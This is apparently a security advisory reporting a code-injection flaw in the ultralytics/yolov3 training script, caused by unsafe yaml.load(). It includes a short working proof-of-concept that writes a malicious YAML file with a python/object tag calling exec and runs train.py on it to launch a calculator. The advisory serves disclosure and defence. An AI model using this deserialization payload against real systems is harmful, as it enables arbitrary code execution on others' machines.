Code Injection in ultralytics/yolov3

Valid

Reported on

Dec 21st 2020

Description

Arbitrary Code Excecution in ultralytics/yolov3. Yolov3 is a model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of vision AI services, spanning from simple expert advice up to delivery of fully customized, end-to-end production solutions.

Technical Description

This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load() in yaml. **NOTE : ** the fix iis to be done in train.py

Exploit code

Python File

import os
exploit = '''!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
'''
os.system('git clone https://github.com/ultralytics/yolov3.git')
os.chdir('yolov3/')
os.system('rm exploit.yml')
open('exploit.yml','w+').write(exploit)
os.system('python train.py --data exploit.yml --cfg exploit.yml --weights "" --batch-size 24')

POC

Run the exploit code

References

https://cdn.discordapp.com/attachments/749019614352244777/786926671960866836/Screenshot_from_2020-12-11_16-21-30.png

to join this conversation